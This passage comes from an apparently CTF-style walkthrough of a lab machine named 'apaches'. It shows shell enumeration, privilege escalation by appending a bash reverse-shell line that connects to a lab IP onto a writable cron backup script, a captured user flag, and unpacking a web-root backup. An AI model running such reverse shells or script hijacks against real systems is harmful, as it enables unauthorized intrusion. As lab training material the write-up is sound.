\/,\/\/\/\/\/   &amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;,  %##%%&amp;&amp;&amp;\/**.,**\/\/(\/\/\/,#&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@&amp;&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;(,\/%%%&amp;&amp;&amp;&amp;&amp;%((**\/\/*\/(\/  \/&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@&amp;&amp;@@@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%*,.#%#&amp;&amp;&amp;#*\/\/\/\/**.     .%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;@&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@&amp;@&amp;@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%#&amp;** \/%#\/*,(..,..       ...*&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@&amp;@@@&amp;@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;@@&amp;#\/.**%&amp;%##(*,.    ..   
.,\/\/&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@&amp;@&amp;@&amp;@&amp;@@&amp;&amp;@@&amp;&amp;@&amp;&amp;&amp;%( %%(&amp;%&amp;%#((%%**@*,.,.,,\/\/,&amp;&amp;&amp;&amp;&amp;&amp;@&amp;&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n\nWell done!\nsquanto@apaches:~$ cat todo.md \n### Development\n\n- [x] Apaches frontpage\n- [ ] Portal for administration\n- [ ] Database selection for administration\n- [ ] Hardening the system for attacks\nsquanto@apaches:~$ sudo -l\n[sudo] password for squanto: \nSorry, user squanto may not run sudo on apaches.\nsquanto@apaches:~$ cd backup\/\nsquanto@apaches:~\/backup$ ls -la\ntotal 8\ndrwxrwxr-x 2 squanto squanto 4096 Oct 10  2022 .\ndrwxr-xr-x 5 squanto squanto 4096 Apr 20 05:40 ..\nsquanto@apaches:~\/backup$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n\n#* 5 * * * * su sacagawea -c &quot;.\/home\/sacagawea\/Scripts\/backup.sh&quot;\ncat: \/etc\/cron.weekly: Is a directory<\/code><\/pre>\n<h3>Privilege Escalation via Cron Job<\/h3>\n<p>First, see what it is:<\/p>\n<pre><code class=\"language-bash\">squanto@apaches:~\/backup$ cat \/home\/sacagawea\/Scripts\/backup.sh\n#!\/bin\/bash\n\nrm -rf \/home\/sacagawea\/Backup\/Backup.tar.gz\ntar -czvf \/home\/sacagawea\/Backup\/Backup.tar.gz \/usr\/local\/apache2.4.49\/htdocs\nchmod 700 \/home\/sacagawea\/Backup\/Backup.tar.gz\nsquanto@apaches:~\/backup$ ls -l \/home\/sacagawea\/Scripts\/backup.sh\n-rwxrwx--- 1 sacagawea Lipan 182 Oct 10  2022 \/home\/sacagawea\/Scripts\/backup.sh<\/code><\/pre>\n<p>It is a backup script; try appending a reverse shell and then running it:<\/p>\n<pre><code class=\"language-bash\">echo &#039;\/bin\/bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&#039; &gt;&gt; 
\/home\/sacagawea\/Scripts\/backup.sh<\/code><\/pre>\n<p>The shell then connected back:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410316.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410316.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240420134824580\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>Information gathering<\/h4>\n<pre><code class=\"language-bash\">(remote) sacagawea@apaches:\/home\/sacagawea$ whoami;id\nsacagawea\nuid=1002(sacagawea) gid=1002(sacagawea) groups=1002(sacagawea),1004(Lipan)\n(remote) sacagawea@apaches:\/home\/sacagawea$ sudo -l\n[sudo] password for sacagawea: \n(remote) sacagawea@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:48 Backup\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) 
sacagawea@apaches:\/home\/sacagawea$ cat user.txt \n\n  _____ _                      __                                                      \n |  ___| | __ _  __ _    ___  \/ _|  ___  __ _  ___ __ _  __ _  __ ___      _____  __ _ \n | |_  | |\/ _` |\/ _` |  \/ _ \\| |_  \/ __|\/ _` |\/ __\/ _` |\/ _` |\/ _` \\ \\ \/\\ \/ \/ _ \\\/ _` |\n |  _| | | (_| | (_| | | (_) |  _| \\__ \\ (_| | (_| (_| | (_| | (_| |\\ V  V \/  __\/ (_| |\n |_|   |_|\\__,_|\\__, |  \\___\/|_|   |___\/\\__,_|\\___\\__,_|\\__, |\\__,_| \\_\/\\_\/ \\___|\\__,_|\n                |___\/                                   |___\/                          \n\n****(************************************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.*,,,,,,\n**\/*******************\/****************.,.,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,,,,,\n***************************************.,%\/*,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,%,,,,,\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/***********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/%,,,,\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/****************,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(,,,\n\/\/\/\/\/\/\/\/\/((((((((((((((\/\/\/\/(\/\/\/\/\/\/*************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,\n\/\/\/\/(((((((((((((((((((((((((\/\/\/\/\/\/\/**********,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\/,\n\/\/((((((((((###########((((((((\/\/\/\/\/(*************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*,,\n(((((((((####################(((((((\/*,,,,,,,,\/\/,,,,\/\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((((((((%########%###%######((((,,,,,,,,,,,*(\/(,,,**\/((\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n((((((########%%%%%%%%%%%%%###,,,,,,,,,,,,,,*((\/,,,,*((((((*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n((((((########%%%%%%%%%%%%%%,,,,,,,,,,,,,,**\/(\/\/,,,,\/\/(((\/(\/\/*,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((((########%%%%%%%%%%%%%#,,,,,,,,,,,,,,,*((\/**,,*\/\/\/(((\/\/*****,,,,*,,,,,*,,,,,,,,,,,,,,,\n((((########%%%%%%%%%%%%%(,,,,,,,,,,,,,,*,****\/((**\/\
/((\/\/\/***,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n(((#######%%%%%%%%%&amp;&amp;%%%%,,,,,,,,,,,**\/\/(((#((##%#((((((\/*,,,,,,,,,,,**,,,,,,,,,,,,,,,,,,,\n##########%%%%%%%%%%&amp;%%%,,,,,,,,,*,***((########%%%%%(\/*\/*(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*\n##########%%%%%%&amp;%&amp;&amp;&amp;&amp;&amp;%,,,,,,*******\/\/((######%%%%%%%%#(,,*\/,,,,,,,,,,*,,,,,,,,,,,,,,,,,,\n###########%%%%%&amp;&amp;&amp;&amp;&amp;&amp;%*,,,,*****\/\/\/\/(((######%%%%%%%%%%%#\/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n#######%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;%,*,,*******,,**\/\/((#####%%%%%%%%%%##\/,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;(,,,*******\/((\/*\/*\/\/(######(((#%%%###,,,,,,,,,,,,,,,,,,,,,,,,,,\/,,,\n###%%%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;,,,***\/\/*\/\/\/,.(,,**(#%%%#(*,**(#%%%%#,*#\/,,,,,,,,,,,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%&amp;%&amp;&amp;&amp;&amp;&amp;&amp;,,***\/\/\/(#######(**\/#%&amp;&amp;%%#%,\/&amp;##(%%%#(##****,,,,,,,,,,,,,*,,,,,,,,,\n##%%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;%\/,,,,*\/\/\/(#####((\/\/\/(%&amp;%%%%%%%%%%%%&amp;%%###\/,*,,,,,,,,,,,,,,,,,,,,,,,,,\n#%%%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;%(\/,,,**\/\/\/\/(((((***(#&amp;&amp;%%%%%%%%%%%%%%%%%#\/***,,,,,,,,,,,,,,,,,,,,,,,,\n##%%%%%%%%%%%%%&amp;&amp;&amp;&amp;&amp;%#(\/\/***\/\/\/\/((((***\/\/#%&amp;&amp;%%%%%%%%%%%%%(%#,*\/**,,,,,,,,,,,,,,,,,,,,,,,,\n###%%%%%%%%%%%%%&amp;%%#(#((\/*,\/\/\/\/\/\/(\/******\/##\/\/%%%%%%%%%%%%%*,,,\/***,,,,,,,,,,,,,,,,,,,,,,,\n####%%%%%%%%%%%%%%%*((\/\/(,#\/\/\/\/\/\/\/\/\/\/\/(#%#%%%%&amp;&amp;%%%%%%%%#%%%,,*\/*,,,,,,,,,,,,,,,,,,,,,,,,,\n#####%%%%%%%%%&amp;%%%.\/\/#(\/,.%%\/\/\/\/\/*,,,*,**((#%%%%%%%%%%%(%%\/%,,*(*,,,,,,,,,,,,,,,,,,,,,,,,,\n#####%%%%%%%%%&amp;%,*(###(*%%%&amp;&amp;#\/\/*****\/(####%%%%%%%%%%%\/,%#,,,,,\/*,,,,,,,,,,,,,,,,*,,,,,,,,\n######%%%%%%%%&amp;((####(*#%%%#*,,,******\/\/*((###%%%%%%#*,\/%%\/,,,,\/,,,,,,,,,,,,,,,,,,,,,,,,,,\n######%%%%%%%%(,(#\/\/,*,%%%#*,*,.,,***\/((#########.\/\/#\/
(%%%((,,,,*,,,,,,,,,,,,,,,,,,,,,,,,,\n#######%%%%%%,,##(%#\/%&amp;%%\/*,*,,.,*###(**\/\/\/(,,,,,*((#\/%%&amp;(,,,,,,(###%&amp;&amp;&amp;,*,,,,,,,,,,,,,,,,\n########%%%%,\/#%#%%%,(\/\/*,,**,..,,,,,,,,,,\/%,,,,\/#%##&amp;%&amp;#,,,,,**\/*\/%#%(&amp;%#**,,,,,,,,,,,,,,\n#########(\/,,*,\/%%&amp;,,*,**,*,\/,,,,,,,,,,*\/,##**,#*%#%%%&amp;&amp;#\/(,,.,*\/***\/*(%##%%\/(%\/\/%#*,,,,,,\n######(,,,,,,####%,,*\/\/\/,\/*,,,,,,,*,,,##%***,(\/#*#((&amp;&amp;&amp;&amp;&amp;\/*,,,,,,,***,%%\/\/(%%%%%%%(#&amp;,*,,*\n(###\/,,,,,,,##%%&amp;.,*,#\/\/\/(,(\/,,,,,*,***\/\/**.\/*##(#(#%%%%&amp;****,,*,,,**,#%%***\/\/(%(%\/%#,,,,*\n###*,,,,,,,#%#&amp;%#,*,#(#\/%#((#&amp;,*****\/\/\/,&amp;%(%(%%#,#*&amp;&amp;&amp;&amp;&amp;*\/*\/*,,.,,,**\/\/\/*,*,**\/\/\/%(%\/%\/*,,\n((,,,,,.,,\/**\/%%,*,##%(%%\/(%&amp;*,,**\/\/(\/*,,%*%%%\/#(#%&amp;&amp;&amp;(&amp;***,,,,,.,**\/\/\/\/*,,,**\/\/\/,##(#%%%%\n\/,,.,,,,,##(%&amp;,,,,#\/%%\/%\/(#%*,,,**\/\/\/*,%(.%#%%%,\/#%(&amp;&amp;#&amp;,*\/*,,,..,,*\/\/\/\/*,,,,\/,%%*\/\/%%(\/\/\/\n.,,...,,,#(%%(,**(\/%%#%%#%%%,,**\/\/\/*,%%,.#*\/%#,*#((&amp;(###,\/,,.,...*,.,\/\/\/*,,,*\/,(%,*(###%(\/\n,,....,,\/#(%%,(\/(##&amp;%#%*\/%*%.,*\/\/\/*%#(.#%.%\/%%*(&amp;&amp;,&amp;%%#*,,,,,,,.,\/,..,\/,#%\/,**,,,,*\/###%##\n.,,,,,,,(*\/(#\/(((%&amp;*####\/%#%(,\/\/,,%%&amp;*&amp;(#%,\/#\/\/%%%&amp;&amp;%&amp;%,*,,.,,,,.*\/.,,\/*,,,,\/\/,,,.#%(%%%%&amp;\n*(,,,,*(%(#\/(\/,(#%.%#%\/##%,&amp;,*\/*%%\/%&amp;.%(%\/%%#,##((##%&amp;#,\/,\/,.,*,\/,\/,.,*\/*,,*\/,,,,,#%&amp;%%%%&amp;\n.,,*,,###%#(#*#(%&amp;&amp;#%%#(%&amp;,%,*%&amp;*%&amp;,,#(%,%(%\/\/&amp;(&amp;&amp;&amp;%%%&amp;*(,*,,,,,*,*\/.,**,,,*\/.,,,*\/\/\/%%%#&amp;\n,,,,,,\/#%%*(,(##%\/\/#(,\/,(**\/#\/\/\/(\/((%*%%\/%*%*#&amp;&amp;&amp;%&amp;&amp;,%\/,#,,(\/.,,.,,\/,,,*,*****,,*\/\/\/#%%%%%\n,,,,\/#*#(###%%#&amp;\/&amp;#%(%\/%&amp;,%\/,%&amp;#%,%%*&amp;&amp;*%,%**(%&amp;&amp;&amp;&amp;&amp;,&amp;(,#,*,,,,,,*(*\/,,,%%\/*,*,*\/\/((#%%%%%\n,\/,#(#%#%#%%#%&amp;%&amp;#%%%&amp;%&amp;,#&amp;,%&amp;(%&amp;*%&amp;&amp;&amp;\/%&amp;%%\/%
%(%##%%&amp;&amp;*%&amp;,,\/*,,*\/,***,,(#%(,,,*\/(((,%%%(%&amp;\n,.((%%#%#%%#%%&amp;%&amp;%&amp;%&amp;%&amp;&amp;%&amp;%(&amp;%%&amp;,%&amp;\/%&amp;%&amp;(%%%&amp;(%&amp;&amp;&amp;&amp;\/&amp;&amp;(&amp;%\/(\/(*,*(%,\/\/,,,*,,,%%*(((,#%%&amp;#&amp;&amp;\n,*\/#%%%#%##%#%#&amp;%&amp;#&amp;#&amp;&amp;(&amp;&amp;,&amp;&amp;%&amp;&amp;%&amp;%&amp;&amp;(&amp;%&amp;&amp;*&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;(%&amp;\/#\/\/\/,,,\/%%(\/*,*,,\/%%&amp;(((\/\/\/\/%%\/%%\n(\/%(###%(%%#&amp;#%#&amp;&amp;&amp;&amp;%&amp;\/&amp;&amp;(&amp;&amp;#%&amp;(&amp;&amp;%&amp;%&amp;&amp;%%#%(&amp;&amp;&amp;&amp;&amp;&amp;%&amp;&amp;%&amp;&amp;%&amp;(\/*(,*\/(*\/\/*,,,,,,*(((,#&amp;\/*%%%##\n#%((#%%#%#%%%%&amp;%&amp;%&amp;%&amp;&amp;%&amp;&amp;(&amp;&amp;%&amp;%%&amp;#&amp;&amp;%&amp;#&amp;&amp;\/&amp;&amp;#%%%&amp;&amp;&amp;&amp;%&amp;&amp;%&amp;&amp;#(\/((,,**(\/*,,,,**,#%,,%%\/\/%%%%#\n%###%#%%#%#%#%#%(&amp;%&amp;&amp;(&amp;&amp;,%&amp;%&amp;&amp;%&amp;&amp;%&amp;#&amp;&amp;%&amp;%%%&amp;%&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;&amp;%&amp;&amp;%(\/*,***\/((\/,,,,*,,#%%,**%%%%&amp;%#\n(####%#%%%%#%%%&amp;%&amp;%&amp;#%%%%&amp;%%&amp;(&amp;&amp;%&amp;&amp;%&amp;(%%(&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%%&amp;%%&amp;%&amp;&amp;*(#\/(\/\/\/(&amp;%%,\/,.#%*%%*,,,\/&amp;&amp;##\n(\/(##(%\/%(%#&amp;(&amp;\/%(&amp;&amp;#&amp;&amp;*%&amp;%&amp;&amp;%&amp;#&amp;&amp;#&amp;&amp;%%##%#%%&amp;&amp;&amp;%&amp;&amp;%&amp;&amp;%&amp;&amp;%&amp;&amp;\/\/\/*,,\/,(%,,,*,,(&amp;****,,,*%&amp;#*\n##%\/%##%(%\/%(&amp;#%&amp;%&amp;*%&amp;*%&amp;(%&amp;*&amp;&amp;%&amp;%%&amp;*%%*%%&amp;&amp;&amp;%&amp;&amp;&amp;&amp;&amp;&amp;&amp;#&amp;&amp;#&amp;&amp;*******,,,(,,,**\/\/***,,,,,*%%#*\n,,,,****(&amp;#&amp;\/&amp;\/&amp;*%#%&amp;\/*&amp;&amp;#&amp;#%&amp;,%&amp;\/&amp;%\/%%#&amp;&amp;%&amp;&amp;&amp;&amp;(&amp;&amp;(&amp;&amp;%&amp;&amp;%&amp;&amp;,,\/(,**,,,,,,*****,,,,,,,,**%**\n(%%(%\/%*%,&amp;,%(%\/(\/**#\/#&amp;*&amp;&amp;*&amp;##&amp;*%&amp;,%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;
&amp;&amp;#&amp;%%&amp;(%&amp;(&amp;&amp;,,,*,,*,,,,,,,****,,,,,,,,,,(#*,\n\nYou are on fire!!\n\nFlag: FlagsNeverQuitNeitherShouldYou\n(remote) sacagawea@apaches:\/home\/sacagawea$ cd Backup\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23128\ndrwxrwxr-x 2 sacagawea sacagawea     4096 Apr 20 05:48 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:48 Backup.tar.gz\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ tar -zxvf Backup.tar.gz \nusr\/local\/apache2.4.49\/htdocs\/\nusr\/local\/apache2.4.49\/htdocs\/images\/\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/10.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/2.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/18.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/3.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/1.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/11.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/16.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/14.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/4.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/8.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/6.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/15.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/13.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/5.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/7.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/12.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/17.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/gallery\/9.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/favicon.ico\nusr\/local\/apache2.4.49\/htdocs\/images\/previous.png\nusr\/local\/apache2.4.49\/htdocs\/images\/logo.png\nusr\/local\/apache2.4.49\/htdocs\/images\/loading.gif\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_logo.j
pg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/2.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/3.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/1.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/team\/4.jpg\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_teamhexa_hover.png\nusr\/local\/apache2.4.49\/htdocs\/images\/close.png\nusr\/local\/apache2.4.49\/htdocs\/images\/next.png\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_teamhexa.png\nusr\/local\/apache2.4.49\/htdocs\/images\/bx_loader.gif\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_footerhexa.png\nusr\/local\/apache2.4.49\/htdocs\/images\/templatemo_contactiframe.png\nusr\/local\/apache2.4.49\/htdocs\/index.html\nusr\/local\/apache2.4.49\/htdocs\/robots.txt\nusr\/local\/apache2.4.49\/htdocs\/css\/\nusr\/local\/apache2.4.49\/htdocs\/css\/bootstrap.min.css\nusr\/local\/apache2.4.49\/htdocs\/css\/templatemo_style.css\nusr\/local\/apache2.4.49\/htdocs\/css\/templatemo_misc.css\nusr\/local\/apache2.4.49\/htdocs\/css\/font-awesome.min.css\nusr\/local\/apache2.4.49\/htdocs\/css\/animate.css\nusr\/local\/apache2.4.49\/htdocs\/fonts\/\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.woff\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.eot\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.svg\nusr\/local\/apache2.4.49\/htdocs\/fonts\/FontAwesome.otf\nusr\/local\/apache2.4.49\/htdocs\/fonts\/fontawesome-webfont.ttf\nusr\/local\/apache2.4.49\/htdocs\/js\/\nusr\/local\/apache2.4.49\/htdocs\/js\/jquery-1.10.2.min.js\nusr\/local\/apache2.4.49\/htdocs\/js\/jquery.lightbox.js\nusr\/local\/apache2.4.49\/htdocs\/js\/templatemo_custom.js\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23132\ndrwxrwxr-x 3 sacagawea sacagawea     4096 Apr 20 05:50 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:50 Backup.tar.gz\ndrwxrwxr-x 
3 sacagawea sacagawea     4096 Apr 20 05:50 usr\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup$ cd usr\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 local\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr$ cd local\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 apache2.4.49\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local$ cd apache2.4.49\/\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local\/apache2.4.49$ ls -la\ntotal 12\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 .\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 ..\ndrwxrwxr-x 6 sacagawea sacagawea 4096 Oct 10  2022 htdocs\n(remote) sacagawea@apaches:\/home\/sacagawea\/Backup\/usr\/local\/apache2.4.49$ cd ..\/..\/..\/..\/\n(remote) sacagawea@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Apr 20 05:50 Backup\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) sacagawea@apaches:\/home\/sacagawea$ cd 
